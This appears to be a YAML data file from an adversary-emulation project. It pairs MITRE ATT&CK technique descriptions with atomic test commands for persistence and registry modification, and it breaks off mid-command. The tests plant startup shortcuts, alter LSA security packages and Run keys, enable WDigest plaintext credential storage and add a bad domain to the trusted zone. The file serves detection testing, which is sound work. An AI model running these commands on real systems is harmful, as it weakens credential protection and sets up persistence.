- Tony Lee
- Josh Day, Gigamon
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '2.5'
atomic_tests: []
T1547.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179
created: '2020-01-24T19:00:32.917Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/009
external_id: T1547.009
- source_name: 'Shortcut for Persistence '
description: Elastic. (n.d.). Shortcut File Written or Modified for Persistence.
Retrieved June 1, 2022.
url: https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence
- source_name: BSidesSLC 2020 - LNK Elastic
description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger
Than Its Weakest LNK. Retrieved November 30, 2020.
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:44.403Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
- Travis Smith, Tripwire
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce
description: |
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
Upon execution, calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
shortcut_file_path:
description: shortcut modified and execute
type: path
default: "%temp%\\T1547.009_modified_shortcut.url"
executor:
command: |
echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
'
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
description: |
LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
supported_platforms:
- windows
executor:
command: |
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
cleanup_command: |
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore
name: powershell
elevation_required: true
T1525:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f
created: '2019-09-04T12:04:03.552Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1525
external_id: T1525
- source_name: Rhino Labs Cloud Image Backdoor Technique Sept 2019
description: Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the
Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.
url: https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
- source_name: Rhino Labs Cloud Backdoor September 2019
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
url: https://github.com/RhinoSecurityLabs/ccat
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:45.786Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Containers
x_mitre_version: '2.2'
atomic_tests: []
T1547.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462
created: '2020-01-24T17:16:11.806Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/005
external_id: T1547.005
- source_name: Graeber 2014
description: Graeber, M. (2014, October). Analysis of Malicious Security Support
Provider DLLs. Retrieved March 1, 2017.
url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
- source_name: Microsoft Configure LSA
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
url: https://technet.microsoft.com/en-us/library/dn408187.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:46.245Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
description: |
Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
name: powershell
elevation_required: true
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
Provider configuration in registry
auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1556.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f
created: '2022-09-28T13:29:53.354Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/007
external_id: T1556.007
- source_name: Azure AD Connect for Read Teamers
description: Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers.
Retrieved September 28, 2022.
url: https://blog.xpnsec.com/azuread-connect-for-redteam/
- source_name: AADInternals Azure AD On-Prem to Cloud
description: 'Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting
access to cloud as an on-prem admin. Retrieved September 28, 2022.'
url: https://o365blog.com/post/on-prem_admin/
- source_name: MagicWeb
description: 'Microsoft Threat Intelligence Center, Microsoft Detection and
Response Team, Microsoft 365 Defender Research Team . (2022, August 24).
MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved
September 28, 2022.'
url: https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/
- source_name: Azure AD Hybrid Identity
description: Microsoft. (2022, August 26). Choose the right authentication
method for your Azure Active Directory hybrid identity solution. Retrieved
September 28, 2022.
url: https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn
- source_name: Mandiant Azure AD Backdoors
description: Mike Burns. (2020, September 30). Detecting Microsoft 365 and
Azure Active Directory Backdoors. Retrieved September 28, 2022.
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:40:10.913Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
These can be maintained in a number of ways. For example, Microsoft Entra
ID includes three options for synchronizing identities between Active Directory
and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
hashes between Active Directory and Entra ID, allowing authentication to Entra
ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
load a malicious DLL that generates authentication tokens for any user with
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Office Suite
- Identity Provider
x_mitre_version: '1.1'
atomic_tests: []
T1112:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
created: '2017-05-31T21:31:23.587Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1112
external_id: T1112
- source_name: CISA Russian Gov Critical Infra 2018
description: CISA. (2018, March 16). Russian Government Cyber Activity Targeting
Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.
url: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors
- source_name: CISA LockBit 2023
description: 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved
March 24, 2025.'
url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
- source_name: Avaddon Ransomware 2021
description: 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware:
an in-depth analysis and decryption of infected systems. Retrieved March
24, 2025.'
url: https://arxiv.org/pdf/2102.04796
- source_name: Microsoft BlackCat Jun 2022
description: Microsoft Defender Threat Intelligence. (2022, June 13). The
many lives of BlackCat ransomware. Retrieved December 20, 2022.
url: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
- source_name: Microsoft Reg
description: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.
url: https://technet.microsoft.com/en-us/library/cc732643.aspx
- source_name: Microsoft Remote
description: Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved
May 1, 2015.
url: https://technet.microsoft.com/en-us/library/cc754820.aspx
- source_name: Microsoft 4657 APR 2017
description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry
value was modified. Retrieved August 9, 2018.'
url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
- source_name: SpectorOps Hiding Reg Jul 2017
description: Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect.
Retrieved August 9, 2018.
url: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
- source_name: Microsoft Reghide NOV 2006
description: Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved
August 9, 2018.
url: https://docs.microsoft.com/sysinternals/downloads/reghide
- source_name: Microsoft RegDelNull July 2016
description: Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11.
Retrieved August 10, 2018.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull
- source_name: TrendMicro POWELIKS AUG 2014
description: 'Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows
Registry. Retrieved August 9, 2018.'
url: https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
- source_name: Unit42 BabyShark Feb 2019
description: Unit 42. (2019, February 22). New BabyShark Malware Targets U.S.
National Security Think Tanks. Retrieved October 7, 2019.
url: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.294Z'
name: Modify Registry
description: |-
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Bartosz Jerzman
- Travis Smith, Tripwire
- David Lu, Tripwire
- Gerardo Santos
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.0'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
description: |
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
supported_platforms:
- windows
executor:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f >nul 2>&1
'
name: command_prompt
- name: Modify Registry of Local Machine - cmd
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
supported_platforms:
- windows
input_arguments:
new_executable:
description: New executable to run on startup instead of Windows Defender
type: string
default: calc.exe
executor:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Modify registry to store logon credentials
auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
supported_platforms:
- windows
executor:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Use Powershell to Modify registry to store logon credentials
auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
description: |
Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
supported_platforms:
- windows
executor:
command: 'Set-ItemProperty -Force -Path ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
-Name ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
'
cleanup_command: 'Set-ItemProperty -Force -Path ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
-Name ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Add domain to Trusted sites Zone
auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
description: |
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
supported_platforms:
- windows
input_arguments:
bad_domain:
description: Domain to add to trusted site zone
type: string
default: bad-domain.com
executor:
command: |
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
cleanup_command: |
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
name: powershell
- name: Javascript in registry
auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
description: |
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
supported_platforms:
- windows
executor:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "